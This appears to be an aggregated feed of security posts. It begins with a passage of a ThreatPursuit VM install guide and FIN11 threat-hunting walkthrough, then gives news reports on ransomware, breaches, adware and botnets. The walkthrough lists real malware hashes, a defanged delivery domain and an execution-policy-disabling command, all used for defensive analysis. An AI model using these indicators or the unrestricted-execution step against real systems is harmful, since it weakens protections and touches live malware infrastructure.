  • Emulate advanced offensive security tradecraft
  • Enable situational awareness through intelligence sharing and reporting
  • Applied data science techniques & visualize clusters of symbolic data
  • Leverage open intelligence sources to provide unique insights for defense and offense

Akin to both FLARE-VM and Commando VM, ThreatPursuit VM uses Boxstarter, Chocolatey and MyGet packages to install software that facilitates the many aspects related to roles performed by analysts. The tools installed provide easy access to a broad range of tooling, including, but not limited to, threat analytics, statistics, visualisation, threat hunting, malware triage, adversarial emulation, and threat modelling. Here are some of the tools, but there are many more:

For a full list of tools, please visit our GitHub repository.

Installation

Similar to FLARE-VM and Commando VM, it's recommended to install ThreatPursuit VM in a virtual machine. The following is an overview of the minimal and recommended installation requirements.

Requirements
  • Windows 10 1903 or greater
  • 60 GB Hard Drive
  • 4 GB RAM
Recommended
  • Windows 10 1903
  • 80+ GB Hard Drive
  • 6+ GB RAM
  • 1 network adapter
  • OpenGL Graphics Card 1024mb
  • Enable Virtualization support for VM
    • Required for Docker (MISP, OpenCTI)
Standard Install

The easiest way to install ThreatPursuit VM is to use the following steps. This will install all the default tools and get you finding evil in no time!

  1. Create and configure a new Windows 10 VM with the aforementioned requirements.
    • Ensure VM is updated completely. You may need to check for updates, reboot and check again until no more remain.
  2. Install your specific VM guest tools (e.g., VMware Tools) to allow additional features such as copy/paste and screen resizing.
  3. Take a snapshot of your machine! This allows you to always have a clean state.
  4. Download and copy install.ps1 to your newly configured VM.
  5. Open PowerShell as an administrator.

Next, unblock the install file by running: Unblock-File .\install.ps1, as seen in Figure 1.


Figure 1: Unblock-File installation script

Enable script execution by running: Set-ExecutionPolicy Unrestricted -f , as seen in Figure 2.


Figure 2: Set-ExecutionPolicy Unrestricted -f script

Finally, execute the installer script as follows: .\install.ps1

After executing install.ps1, you’ll be prompted for the administrator password in order to automate host restarts during installation as several reboots occur. Optionally, you may pass your password as a command-line argument via ".\install.ps1 -password <password>". If you do not have a password set, hitting enter when prompted will also work.

This will be the last thing you will need to do before the installation is unattended. The script will set up the Boxstarter environment and proceed to download and install the ThreatPursuit VM environment, as seen in Figure 3.


Figure 3: Installation script execution

The installation process may take upwards of several hours depending on your internet connection speed and the web servers hosting the various files. Figure 4 shows the post-installation desktop environment, featuring the logo and a desktop shortcut. You will know when the install is finished with the VM's logo placed on the background. 


Figure 4: ThreatPursuit VM desktop installed

Custom Install

Is the standard installation too much for you? We provide a custom installation method that allows you to choose which chocolatey packages get installed. For additional details, see the Custom Install steps at our GitHub repository.

Installing Additional Packages

Since ThreatPursuit VM uses the Chocolatey Windows package manager, it's easy to install additional packages not included by default. For example, entering the command cinst github as administrator installs GitHub Desktop on your system.

To update all currently installed packages to their most recent versions, run the command cup all as administrator.

Getting Started: A Use Case

As threat analysts, what we choose to pursue will depend on the priorities and requirements of our current role. Often, they vary with each threat or adversary encountered such as financial crime, espionage, issue-motivated groups or individuals. The role broadly encompasses the collection and analysis of threat data (e.g., malware, indicators of attack/compromise) with the goal of triaging the data and developing actionable intelligence. For example, one may want to produce detection signatures based on malware network communications to classify, share or disseminate indicators of compromise (IOCs) in standardized ways. We may also use these IOCs in order to develop and apply analytical products that establish clusters of analogous nodes such as MITRE ATT&CK tactics and techniques, or APT groups. On the other hand, our goal can be as simple as triaging a malware sample behavior, hunting for indicators, or proving or disproving a hypothesis. Let's look at how we might start.

Open Hunting

To start our use case, let’s say we are interested in reviewing latest threat actor activity reported for the quarter. We sign in to the Mandiant Advantage portal (Figure 5) using our public subscription to get a snapshot view of any highlighted activity (Figure 6).


Figure 5: Mandiant Advantage portal


Figure 6: Actor activity for Q3 2020

Based on Mandiant Advantage report, we notice a number of highly active APT and FIN actors. We choose to drill in to one of these actors by hovering our mouse and selecting the actor tag FIN11.

We receive a high-level snapshot summary view of the threat actor, their targeted industry verticals, associated reports and much more, as seen in Figure 7. We also may choose to select the most recent report associated with FIN11 for review.


Figure 7: FIN11 actor summary

By selecting the “View Full Page” button as seen at the top right corner of Figure 6, we can use the feature to download indicators, as seen in the top right corner of Figure 8.


Figure 8: Full FIN11 page

Within the FIN11 report, we review the associated threat intelligence tags that contain finished intelligence products. However, we are interested in the collection of raw IOCs (Figure 9) that we could leverage to pivot off or enrich our own datasets.


Figure 9: Downloaded FIN11 indicators

Using the Malware Information Sharing Platform (MISP)as our collection point, we are going to upload and triage our indicators using our local MISP instance running on ThreatPursuit VM.

Please note you will need to ensure your local MISP instance is running correctly with the configuration of your choosing. We select the “Add Event” button, begin populating all needed fields to prepare our import, and then click “Submit”, as shown in Figure 10.


Figure 10: MISP triage of events

Under the tags section of our newly created FIN11 event, we apply relevant tags to begin associating aspects of contextual information related to our target, as seen in Figure 11.


Figure 11: MISP Event setup for FIN11

We then select “Add Attribute” into our event, which will allow us to import our MD5 hashes into the MISP galaxy, as seen in Figure 12. Using both the category and type, we select the appropriate values that best represent our dataset and prepare to submit that data into our event.


Figure 12: MISP import events into FIN11 event

MISP allows for a streamlined way to drill and tag indicators as well as enrich and pivot with threat intelligence. We can also choose to perform this enrichment process within MISP using a variety of open intelligence sources and their modules, such as Mandiant Advantage, PassiveTotal, Shodan and VirusTotal. We can also achieve the same result using similar tools already packaged in ThreatPursuit VM.

Using Maltego CE, installed as part of the VM, we can automate aspects of targeted collection and analysis of our FIN11 malware families and associated infrastructure. The following are just some of the Maltego plugins that can be configured post installation to help with the enrichment and collection process:

Targeting the suspected payload, we attempt to pivot using its MD5 hash value (113dd1e3caa47b5a6438069b15127707) to discover additional artifacts, such as infrastructure, domain record history, previously triaged reports, similar malware samples, timestamps, and the rich headers.

Importing our hash into Maltego CE, we can proceed to perform a range of queries to hunt and retrieve interesting information related to our FIN11 malware, as seen in Figure 13.


Figure 13: Maltego CE querying MD5 hash

Quite quickly we pull back indicators; in this case, generic named detection signatures from a range of anti-malware vendors. Using VirusTotalAPI Public, we perform a series of collection and triage queries across a variety of configured open sources, as shown in Figure 14.


Figure 14: Automating enrichment and analysis of targeted infrastructure

A visual link has been made public for quick reference.  

With our newly identified information obtained by passively scraping those IOCs from a variety of data providers, we can identify additional hashes, delivery URLs and web command and control locations, as shown in Figure 15.


Figure 15: Maltego visualization of FIN11 dropper

Pivoting on the suspected FIN11 delivery domain near-fast[.]com, we have found several more samples that were uploaded to an online malware sandbox website AppAnyRun. Within the ThreatPursuit VM Google Chrome browser and in the Tools directory, there are shortcuts and bookmarks to a range of sandboxes to help with accessing and searching them quickly. We can use AppAnyRun to further analyze the heterogenous networks and execution behaviors of these acquired samples.

We have identified another similar sample, which is an XLS document named “MONITIORING REPORT.xls” with the MD5 hash 5d7d2371668ad4a6484f76b0b6511961 (Figure 16). Let’s attempt to triage this newly discovered sample and qualify the relationship back to FIN11.


Figure 16: VirusTotal execution report of 5d7d2371668ad4a6484f76b0b6511961

Extracting interesting strings and indicators from this sample allows us to compare these artifacts against our own dynamic analysis. If we can’t access the original malware sample, but we have other indicators to hunt with, we could also pivot on various unique characteristics and attributes (e.g., imphash, vthash, pdb string, etc...) to discover related samples.

Even without access to the sample, we can also use YARA to mine for similar malware samples. One such source to mine is using the mquery tool and their datasets offered via CERT.PL. To fast track the creation of a YARA rule, we leverage the FIN11 YARA rule provided within the FIN11 Mandiant Advantage report. Simply copy and paste the YARA rule into mquery page and select “Query” to perform the search (Figure 17). It may take some time, so be sure to check back later (here are the results).


Figure 17: mquery YARA rule hunting search for FIN11 malware

Within our mquery search, we find a generic signature hit on Win32_Spoonbeard_1_beta for the MD5 hash 3c43d080b5badfdde7aff732c066d1b2. We associate this MD5 hash with another sandbox, app.any.run, at the following URL:

  • https://app.any.run/tasks/19ac204b-9381-4127-a5ac-d6b68e0ee92c/

As seen in Figure 18, this sample was first uploaded on May 2, 2019, with an associated infection chain intact.

Figure 18: AppAnyRun Execution Report on 3c43d080b5badfdde7aff732c066d1b2

We now have a confident signature hit, but with different named detections on the malware family. This is a common challenge for threat analysts and researchers. However we have gained interesting information about the malware itself such as its execution behavior, encryption methods, dropped files, timelines and command and control server and beacon information. This is more than enough for us to pivot across our own datasets to hunt for previously seen activities and prepare to finalize our report.

Once we are confident in our analysis, we can start to model and attribute the malware characteristics. We can leverage other threat exchange communities and intelligence sources to further enrich the information we collected on the sample. Enrichment allows the analysts to greater extrapolate context such as timings, malware similarity, associated infrastructures, and prior targeting information. We will briefly add our content into our MISP instance and apply tags to finalize our review.

We may wish to add MITRE ATT&CK tags (Figure 19) relevant across the malware infection chain for our sample as they could be useful from a modelling standpoint.


Figure 19: MITRE ATT&CK tags for the malware sample

Final Thoughts

We hope you enjoyed this basic malware triage workflow use-case using ThreatPursuit VM. There are so many more tools and capabilities within the included toolset such as Machine learning (ML) and ML algorithms, that also assist threat hunters by analyzing large volumes of data quickly. Check out some of FireEye’s ML blog posts here.

For a complete list of tools please see the ThreatPursuit VM GitHub repository. We look forward to releasing more blog posts, content and playbooks as our user base grows.

And finally, here are some related articles that might be of interest.

Malware Analysis

Digital Forensics

Intelligence Analysis and Assessments

Trump campaign website defaced by scammers

Hackers broke into a website used in Donald Trump ‘s campaign website on Tuesday, the news is worrying because comes a few days before Election Day.

Hackers defaced a website used in Donald Trump’s campaign website, donaldjtrump.com, displaying the following message:

“This site was seized.” “The world has had enough of the fake-news spreaded daily by president donald j trump.”

Trump site hacked

The hack was first reported Gabriel Lorenzo Greschler on Twitter, it took place shortly before 4 PM Pacific time. 

The news is worrying because comes ahead of the incoming Election Day. Hackers likely gained access to the web server back-end and inserted obfuscated JavaScript to display the above message.

The website was quickly restored, Trump campaign spokesman Tim Murtaugh confirmed that no sensitive data was compromised as result of the attack,

“The Trump campaign website was defaced and we are working with law enforcement authorities to investigate the source of the attack,” Murtaugh said.

The attackers don’t appear to be politically motivated, according to the website Techcrunch the site was hacked by scammers with the purpose to collect hard-to-trace cypto-currency Monero.

The scammers claimed to have confidential information on Trump and his relatives, they provided two Monero addresses where transfer funds to receive the alleged information.

The scammers instructed people to send crypto-currency to one address if they wanted the strictly classified information released and to another to keep it secret.

Experts noticed that page was signed with a PGP public key corresponding to an email address at a non-existent domain (planet.gov).

Pierluigi Paganini

(SecurityAffairs – hacking, Trump election day)

The post Trump campaign website defaced by scammers appeared first on Security Affairs.

Experts Weigh in on E-Commerce Security Amid Snowballing Threats

How a retail sector reeling from COVID-19 can lock down their online systems to prevent fraud during the upcoming holiday shopping spike.

Steelcase office furniture giant hit by Ryuk ransomware attack

Office furniture company Steelcase was hit by Ryuk ransomware attack that forced it to shut down its network to avoid the malware from spreading.

Steelcase is a US-based furniture company that produces office furniture, architectural and technology products for office environments and the education, health care and retail industries. It is the largest office furniture manufacturer in the world. It has facilities, offices, and factories in the Americas, Europe, Asia, the Middle East, Australia and Africa.

Steelcase has 13,000 employees and $3.7 billion in 2020. The company is the last victim of the Ryuk ransomware operators, the attack forced the firm to shut down its network to avoid the malware from spreading.

In an 8-K form filed with the Securities and Exchange Commission (SEC), the company has disclosed the ransomware attack that took place on October 22nd, 2020.

“On October 22, 2020, Steelcase Inc. (the “Company”) detected a cyberattack on its information technology systems. The Company promptly implemented a series of containment measures to address this situation including temporarily shutting down the affected systems and related operations.” reads the 8-K form.

The company immediately started the incident response procedure in an attempt to restore the affected systems and return to normal operations as soon as possible. The company is not aware of data loss caused by the ransomware attack.

Bleeping Computer, citing a source in the cybersecurity industry, confirmed that Steelcase suffered a Ryuk ransomware attack.

“At this time, the Company is not aware of any data loss from its systems or any other loss of assets as a result of this attack. Although cyberattacks can be unpredictable, the Company does not currently expect this incident will have a material impact on its business operations or its financial results.” continues the form.

Ryuk ransomware operators were very active during the recent weeks, recently the gang infected systems at the Universal Health Services and French IT outsourcer Sopra Steria.

In March, the City of Durham shut down its network after Ryuk Ransomware attack.

A few days before, EVRAZ, one of the world’s largest multinational vertically integrated steel making and mining companies, has been hit by the Ryuk ransomware.

The list of the victims of the Ryuk ransomware is very long and includes the US government contractor Electronic Warfare Associates (EWA), US railroad company Railworks, Croatian petrol station chain INA Group, and parts manufacturer Visser Precision.

Threat actors behind Ryuk attacks often used the BazarLoader or TrickBot infections to gain a foothold in the target networks and then deploy Ryuk.

Pierluigi Paganini

(SecurityAffairs – hacking, Steelcase)

The post Steelcase office furniture giant hit by Ryuk ransomware attack appeared first on Security Affairs.

Attacks on IoT devices continue to escalate

Attacks on IoT devices continue to rise at an alarming rate due to poor security protections and cybercriminals use of automated tools to exploit these vulnerabilities, according to Nokia. IoT devices most infected The report found that internet-connected, or IoT, devices now make up roughly 33% of infected devices, up from about 16% in 2019. The report’s findings are based on data aggregated from monitoring network traffic on more than 150 million devices globally. Adoption … More

The post Attacks on IoT devices continue to escalate appeared first on Help Net Security.

Enel Group suffered the second ransomware attack this year

Multinational energy company Enel Group has been hit by Netwalker ransomware operators that are asking a $14 million ransom.

Systems at the multinational energy company Enel Group has been infected with Netwalker ransomware, it is the second ransomware attack suffered by the energy giant this year. Netwalker ransomware operators are asking a $14 million ransom for the decryption key, the hackers claim to have stolen several terabytes from the company and threaten to leak them if the ransom will be not paid.

Enel S.p.A., or the Enel Group, is an Italian multinational energy company that is active in the sectors of electricity generation and distribution, as well as in the distribution of natural gas.

The company has more than 61 million customers in 40 countries, it ranks 87 in Fortune Global 500, with $90 billion in revenues in 2019.

In June, Enel was hit by Snake ransomware, but the attack was quickly contained and the malware was not able to spread within its network.

The news of a possible ransomware attack against Enel Group was reported to BleepingComputer by a researcher on October 19.

The researcher shared with BleepingComputer a Netwalker ransom note that appeared to be used in the attack on Enel Group.

Netwalker Enel Group ransom-note
Source Bleeping Computer

BleepingComputer attempted to notify Enel Group last week without success. A few days later, Netwalker announced the leak of the company data through their support chat.

Enel never replied to the message of the ransomware operators, for this reason, the attackers started leaking a portion of the stolen data as proof of the data breach.

The operators are asking $14 million worth of Bitcoin (roughly 1234.02380000 BTC).

ENEL group netwalker-page-for-enel
Source Bleeping Computer

Today, the Netwalker ransomware operators added Enel Group to their data leak site and some screenshots of unencrypted files stolen from the company.

The Italian cyber security firm TG soft publicly shared the news of the attack in a tweet:

The hackers stole about 5 terabytes of documents from the company and announced that they will “analyze every file for interesting things” and publish it on their leak site.

At the time of publishing this post, the company have yet to confirm the incident, let’s remember that the company conduct will have to be in compliance with the current EU privacy legislation GDPR.

Pierluigi Paganini

(SecurityAffairs – hacking, ENEL Group)

The post Enel Group suffered the second ransomware attack this year appeared first on Security Affairs.

Google removes a set of 21 malicious apps from the Play Store

Google has removed 21 malicious apps from the official Play Store because they were found to serve intrusive and annoying ads.

Google has removed 21 new malicious apps from the official Play Store because they were found displaying intrusive ads.

The following malicious apps were spotted by researchers from cybersecurity firm Avast:

Shoot Them
Crush Car
Rolling Scroll
Helicopter Attack – NEW
Assassin Legend – 2020 NEW
Helicopter Shoot
Rugby Pass
Flying Skateboard
Iron it
Shooting Run
Plant Monster
Find Hidden
Find 5 Differences – 2020 NEW
Rotate Shape
Jump Jump
Find the Differences – Puzzle Game
Sway Man
Money Destroyer
Desert Against
Cream Trip – NEW
Props Rescue

The Android apps reported in the above table were downloaded nearly eight million times by Android users.

“the apps in question are 21 gaming apps that come packed with hidden adware that is part of the HiddenAds family. According to SensorTower, a mobile apps marketing intelligence and insights company, the apps have been downloaded approximately eight million times thus far.” reads the post published by Avast.

The tainted gaming apps are bundled with HiddenAds malware, which is known to be an adware that serves intrusive ads outside of the app.

Threat actors behind these malicious apps advertised them on social media channels to lure users into downloading them.

“Developers of adware are increasingly using social media channels, like regular marketers would,” Jakub Vávra, Threat Analyst at Avast, says. “This time, users reported they were targeted with ads promoting the games on YouTube. In September, we saw adware spread via TikTok. The popularity of these social networks make them an attractive advertising platform, also for cybercriminals, to target a younger audience,”

Upon installing the malicious apps, they hide their icons to prevent deletion and they also hide behind relevant-looking advertisements, making them hard to identify. 

The apps also have the ability to draw over other apps to show timed ads that users cannot skip. Experts also reported that in some cases the malware uses the browser to bombard the users with annoying ads.

Fortunately, the apps do not implement rootkit capabilities and users can uninstall them from the app manager features of the device.

It is not the first time that AVAST discovers tainted applications in the official Play Store. In July, the researchers from AVAST discovered a currency converter application in the Google Play store that was downloaded by more than 10,000 users and that was designed to deliver the Cerberus banking Trojan.

Pierluigi Paganini

(SecurityAffairs – hacking, Google Play Store)

The post Google removes a set of 21 malicious apps from the Play Store appeared first on Security Affairs.

Fragomen law firm data breach exposed Google employee’s data

Immigration law firm Fragomen has disclosed a data breach that exposed current and former Google employees’ personal information.

Immigration law firm Fragomen, Del Rey, Bernsen & Loewy, LLP, one of the most prominent US law firms covering immigration law, disclosed a data breach.

The security breach exposed current and former Google employees’ personal information after an unauthorized third party gained access to a single file containing personal information relating to I-9 employment verification services.

The firm discovered the intrusion on September 24, 2020 and engaged a digital forensic investigation firm to assist with this investigation.

“We recently became aware of suspicious activity within our computer network. While our investigation is ongoing, we discovered that an unauthorized third party gained access to a single file containing personal information relating to I-9 employment verification services. This file contained personal information for a discrete number of Googlers (and former Googlers), including you,” reads the data breach notification sent to the impacted people.

A Form I-9 is filled out by all US employees to verify their identity and employment authorization for employment in the United States.

The form contains employee’s information, including full name, date of birth, phone number, social security number, passport numbers, mailing address, and email address,

Exposed data could be abused by crooks to carry out multiple malicious activities, including identity theft. Users should be vigilant and report to the authorities any suspicious activities.

Fragomen is offering one year of free credit monitoring to the affected Google’s employees.

“We are offering complimentary identity theft protection and credit monitoring services to all Googlers (and former Googlers) who may have been affected by this incident in countries where these services are available. These services are available through IDX, the data breach and recovery services expert.” continues the notification notice. “IDX identity protection services include: 12 months of credit and CyberScan monitoring, a $1,000,000 insurance reimbursement policy, and fully managed ID theft recovery services. With this protection, IDX will help you resolve issues if your identity is compromised.”

Pierluigi Paganini

(SecurityAffairs – hacking, Fragomen)

The post Fragomen law firm data breach exposed Google employee’s data appeared first on Security Affairs.

The Nastiest Malware of 2020

Reading Time: ~ 4 min.

For the third year running, we’ve examined the year’s biggest cyber threats and ranked them to determine which ones are the absolute worst. Somewhat unsurprisingly, phishing and RDP-related breaches remain the top methods we’ve seen cybercriminals using to launch their attacks. Additionally, while new examples of malware and cybercriminal tactics crop up each day, plenty of the same old players, such as ransomware, continue to get upgrades and dominate the scene.

For example, a new trend in ransomware this year is the addition of a data leak/auction website, where criminals will reveal or auction off data they’ve stolen in a ransomware attack if the victim refuses to pay. The threat of data exposure creates a further incentive for victims to pay ransoms, lest they face embarrassing damage to their personal or professional reputations, not to mention hefty fines from privacy-related regulatory bodies like GDPR.

But the main trend we’ll highlight here is that of modularity. Today’s malicious actors have adopted a more modular malware methodology, in which they combine attack methods and mix-and-match tactics to ensure maximum damage and/or financial success.

Here are a few of nastiest characters and a breakdown of how they can work together.

  • Emotet botnet + TrickBot Trojan + Conti/Ryuk ransomware
    There’s a reason Emotet has topped our list for 3 years in a row. Even though it’s not a ransomware payload itself, it’s the botnet that is responsible for the most ransomware infections, making it pretty darn nasty. It’s often seen with TrickBot, Dridex, QakBot, Conti/Ryuk, BitPaymer and REvil.

    Here’s how an attack might start with Emotet and end with ransomware. The botnet is used in a malicious spam campaign. An unwitting employee at a company receives the spam email, accidentally downloads the malicious payload. With its foot in the door, Emotet drops TrickBot, an info-stealing Trojan. TrickBot spreads laterally through the network like a worm, infecting every machine it encounters. It “listens” for login credentials (and steals them), aiming to get domain-level access. From there, attackers can perform recon on the network, disable protections, and drop Conti/Ryuk ransomware at their leisure.
  • Ursnif Trojan + IcedID Trojan + Maze ransomware
    Ursnif, also known as Gozi or Dreambot, is a banking Trojan that has resurfaced after being mostly dormant for a few years. In an attack featuring this troublesome trio, Ursnif might land on a machine via a malicious spam email, botnet, or even TrickBot, and then drop the IcedID Trojan to improve the attackers’ chances of getting the credentials or intel they want. (Interestingly, IcedID has been upgraded to use steganographic payloads. Steganography in malware refers to concealing malicious code inside another file, message, image or video.) Let’s say the Trojans obtain the RDP credentials for the network they’ve infected. In this scenario, the attackers can now sell those credentials to other bad actors and/or deploy ransomware, typically Maze. (Fun fact: Maze is believed to have “pioneered” the data leak/auction website trend.)
  • Dridex/Emotet malspam + Dridex Trojan + BitPaymer/DoppelPaymer ransomware

Like TrickBot, Dridex is another very popular banking/info-stealing Trojan that’s been around for years. When Dridex is in play, it is either dropped via Emotet or its authors’ own malicious spam campaign. Also like TrickBot, Dridex spreads laterally, listens for credentials, and typically deploys ransomware like BitPaymer/DoppelPaymer.

As you can see, there are a variety of ways the attacks can be carried out, but the end goal is the more or less the same. The diverse means just help ensure the likelihood of success.

The characters mentioned above are, by no means, the only names on our list. Here are some of the other notable contenders for Nastiest Malware.

  • Sodinokibi/REvil/GandCrab ransomware – all iterations of the same ransomware, this ransomware as a service (RaaS) payload is available for anyone to use, as long as the authors get a cut of any successful ransoms.
  • CrySiS/Dharma/Phobos ransomware – also RaaS payloads, these are almost exclusively deployed using compromised RDP credentials that are either brute-forced or easily guessed.
  • Valak – a potent multi-functional malware distribution tool. Not only does it commonly distribute nasty malware such as IcedID and Ursnif, but it also has information stealing functionalities built directly into the initial infection.
  • QakBot – an info-stealing Trojan often dropped by Emotet or its own malspam campaigns with links to compromised websites. It’s similar to TrickBot and Dridex and may be paired with ProLock ransomware.

Combine protections to combat combined attacks.

If businesses want to stay safe, they need to implement multiple layers of protection against these types of layered attacks. Here are some tips from our experts.

  • Lock down RDP. Security analyst Tyler Moffitt says unsecured RDP has risen over 40% since the COVID-19 pandemic began because more businesses are enabling their workforce to work remotely. Unfortunately, many are not doing so securely. He recommends businesses use RDP solutions that encrypt the data and use multi-factor authentication to increase security when remoting into other machines.
  • Educate end users about phishing. Principal product manager Phil Karcher points out that many of the attack scenarios listed above could be prevented with stronger phishing/spam awareness among end users. He recommends running regular security training and phishing simulations with useful feedback. He also says it’s critical that employees know when and how to report a suspicious message.
  • Install reputable cybersecurity software. Security intelligence director Grayson Milbourne can’t stress enough the importance of choosing a solution that uses real-time threat intelligence and offers multi-layered shielding to detect and prevent multiple kinds of attacks at different attack stages.
  • Set up a strong backup and disaster recovery plan. VP of product management Jamie Zajac says that, particularly with a mostly or entirely remote workforce, businesses can’t afford not to have a strong backup. She strongly recommends regular backup testing and setting alerts and regular reporting so admins can easily see if something’s amiss.

Discover more about the 2020’s Nastiest Malware on the Webroot Community.

The post The Nastiest Malware of 2020 appeared first on Webroot Blog.

Over 100 irrigation systems left exposed online without protection

Researchers found more than 100 smart irrigation systems running ICC PRO that were left exposed online without a password last month.

Security experts from the Israeli security firm Security Joes discovered more than 100 irrigation systems running ICC PRO that were left exposed online without protection. ICC PRO is a top-shelf smart irrigation system designed by Motorola.

The ICC PRO systems were deployed with default factory settings, which don’t have a password for the default user’s account.

To worsen the situation, experts pointed out that it is quite simple to search for these devices exposed on the Internet by using IoT search engines like Shodan.

Once the attacker has gained access to the device, it can perform multiple actions from the control panel, including control the quantity and the pressure of the water delivered to the pumps, deleting users, or change settings.

irrigation systems

The experts revealed that the majority of the devices were located in Israel.

Security Joes co-founder Ido Naor reported his findings to CERT Israel last month, which notified Motorola and CERT teams in other countries. CERT Israel also contacted the companies that exposed the irrigation systems online without protection. Motorola also sent a letter to its customers about the risks of exposing irrigation systems online without protection.

The good news is that several organizations started securing their devices, the number of unsecured ICC PRO instances dropped to 78 today.

In April, an attack hit an Israeli water facility attempting to modify water chlorine levels. In June, officials from the Water Authority revealed two more cyber attacks on other facilities in the country.

Two cyber-attacks took place in June and according to the officials, they did not cause any damage to the targeted infrastructure.

One of the attacks hit agricultural water pumps in upper Galilee, while the other one hit water pumps in the central province of Mateh Yehuda.

Israel’s National Cyber Directorate announced to have received reports of cyber attacks aimed at supervisory control and data acquisition (SCADA) systems at wastewater treatment plants, pumping stations and sewage facilities.

Pierluigi Paganini

(SecurityAffairs – hacking, irrigation systems)

The post Over 100 irrigation systems left exposed online without protection appeared first on Security Affairs.

Nitro PDF data breach might impact major companies, including Microsoft, Google, and Apple

Nitro PDF suffered a massive data breach that impacts many major organizations, including Apple, Chase, Citibank, Google, and Microsoft.

A massive data breach suffered by the Nitro PDF might have a severe impact on well-known organizations, including Google, Apple, Microsoft, Chase, and Citibank.

Nitro Software, Inc. develops commercial software used to create, edit, sign, and secure Portable Document Format (PDF) files and digital documents. The company has over 650,000 business customers worldwide, and claims millions of users across the globe.

According to the following the security advisory issued by the software maker and unauthorized third party gained limited access to a company database.

"NITRO ADVISES OF LOW IMPACT SECURITY INCIDENT
* AN ISOLATED SECURITY INCIDENT INVOLVING LIMITED ACCESS TO NITRO DATABASE BY AN UNAUTHORISED THIRD PARTY
* DATABASE DOES NOT CONTAIN USER OR CUSTOMER DOCUMENTS.
* INCIDENT HAS HAD NO MATERIAL IMPACT ON NITRO'S ONGOING OPERATIONS.
* INVESTIGATION INTO INCIDENT REMAINS ONGOING
* NO EVIDENCE CURRENTLY THAT ANY SENSITIVE OR FINANCIAL DATA RELATING TO CUSTOMERS IMPACTED OR IF INFO MISUSED
* DOES NOT ANTICIPATE A MATERIAL FINANCIAL IMPACT TO ARISE FROM INCIDENT
* INCIDENT IS NOT EXPECTED TO IMPACT CO'S PROSPECTUS FORECAST FOR FY2020"

Cybersecurity intelligence firm Cyble came across a threat actor that was selling a database, allegedly stolen from Nitro Software’s cloud service, that includes users’ data and documents. The huge archive contains 1TB of documents, the threat actor is attempting to sell it in a private auction with the starting price of $80,000.

NITRO PDF

The database contains a table named ‘user_credential’ that contains 70 million user records, including email addresses, full names, bcrypt hashed passwords, titles, company names, IP addresses, and other system-related data.

Cyble shared the database with Bleeping Computer that was able to determine the authenticity of the database.

“From the samples of the database shared with BleepingComputer, the document titles alone disclose a great deal of information about financial reports, M&A activities, NDAs, or product releases.” states BleepingComputer.

The records in the document database contain a file’s title, whether it was created, signed, what account owns the document, and whether it’s public.

I have reached Cyber for a comment, below their statement:

“Considering the scale and extent of the breach, this is one of the worst breaches Cyble has seen in the last few years. The cybercriminals were not only able to access sensitive account details, but also the information related to shared documents as well. Majority of the Fortune 500 organizations are affected by this breach.”

The databases contain a large number of records belonging to well-known companies:

Company# of accounts# of documents
Amazon5,44217,137
Apple5846,405
Citi653137,285
Chase85177
Google3,67832,153
Microsoft3,3302,390
M&A documents
M&A documents

Cyble has added the data related to the NITRO PDF data breach to its AmIBreached.com data breach notification service.

Pierluigi Paganini

(SecurityAffairs – hacking, Nitro PDF)

The post Nitro PDF data breach might impact major companies, including Microsoft, Google, and Apple appeared first on Security Affairs.

KashmirBlack, a new botnet in the threat landscape that rapidly grows

Security experts spotted a new botnet, tracked as KashmirBlack botnet, that likely infected hundreds of thousands of websites since November 2019.

Security experts from Imperva have spotted a new sophisticated botnet, tracked as KashmirBlack is believed to have already infected hundreds of thousands of websites by exploiting vulnerabilities in their content management system (CMS) platforms.

The KashmirBlack botnet has been active at least since November 2019, operators leverages dozens of known vulnerabilities in the target servers.

Experts believe that the botmaster of the KashmirBlack botnet is a hacker that goes online with moniker “Exect1337,” who is a member of the Indonesian hacker crew ‘PhantomGhost’.

The experts observed millions of attacks per day on average, on thousands of victims in more than 30 different countries around the world.

“It has a complex operation managed by one C&C (Command and Control) server and uses more than 60 – mostly innocent surrogate – servers as part of its infrastructure. It handles hundreds of bots, each communicating with the C&C to receive new targets, perform brute force attacks, install backdoors, and expand the size of the botnet.” reads the first part of two reports published by the experts detailing the DevOps implementation behind the botnet.

KashmirBlack botnet

The primary purpose of the KashmirBlack botnet is to abuse resources of compromised systems for cryptocurrency mining and redirecting a site’s legitimate traffic to spam pages.

Experts observed a continuous growth of the botnet since its discovery along with an increasing level of complexity.

In May experts observed an increase in the command-and-control (C&C) infrastructure and the exploits used by botnet operators.

KashmirBlack scans the internet for sites using vulnerable CMS versions and attempting to exploit known vulnerabilities to them and take over the underlying server.

Below a list of vulnerabilities exploited by the botnet operators to compromise websites running multiple CMS platforms, including WordPress, Joomla!, PrestaShop, Magneto, Drupal, vBulletin, osCommerce, OpenCart, and Yeager:

“During our research we witnessed its evolution from a medium-volume botnet with basic abilities to a massive infrastructure that is here to stay,” Imperva concludes.

The second part of the report also includes Indicators of Compromise (IoCs) for this botnet.

Pierluigi Paganini

(SecurityAffairs – hacking, KashmirBlack botnet)

The post KashmirBlack, a new botnet in the threat landscape that rapidly grows appeared first on Security Affairs.

Finnish psychotherapy center Vastaamo suffered a shocking security breach

Private Finnish psychotherapy center Vastaamo suffered a security breach, hackers are now demanding ransom to avoid the leak of sensitive data they have stolen.

Finland’s interior minister summoned an emergency meeting Sunday after the private Finnish psychotherapy center Vastaamo suffered a security breach that caused the exposure of patient records. To worse the situation the hackers now demanding ransoms threatening to leak the stolen data.

Vastaamo operates as a sub-contractor for Finland’s public health system, according to the authorities, the hackers have stolen patient sensitive data during two attacks that started almost two years ago.

Finnish Interior Minister Maria Ohisalo tweeted that authorities would “provide speedy crisis help to victims” of the security breach at the Vastaamo psychotherapy center, an incident she called “shocking and very serious.”

The Finnish Interior Minister Ohisalo defined the attack “shocking and very serious” and expressed the commitment of the authorities in providing “speedy crisis help to victims.”

President Sauli Niinisto called the blackmailing “cruel” and “repulsive,” while Prime Minister Sanna Marin added that such kind of attacks is “shocking in many ways.”

The attacker that goes online with the moniker ’ransom_man’ has already leaked 300 patient records containing names and contact information and is blackmailing the victims that received emails from the hackers.

“It was not immediately clear if the stolen information included diagnoses, notes from therapy sessions or other potentially damaging information. Also, it wasn’t clear why the information was surfacing only now.” reported the Associated Press.

According to a statement published by Vastaamo on Saturday, the first attack likely took place between the end of November 2018 and March 2019.

The National Bureau of Investigation is investigating the incident and revealed that the data breach may have impacted up to “tens of thousands” of the Vastaamo clients.

“What makes this case exceptional is the contents of the stolen material,” Marko Leponen, the National Bureau of Investigation’s chief investigator assigned to the case, told reporters.

Vastaamo urged clients who were contacted by the intruders to immediately contact Finnish police.

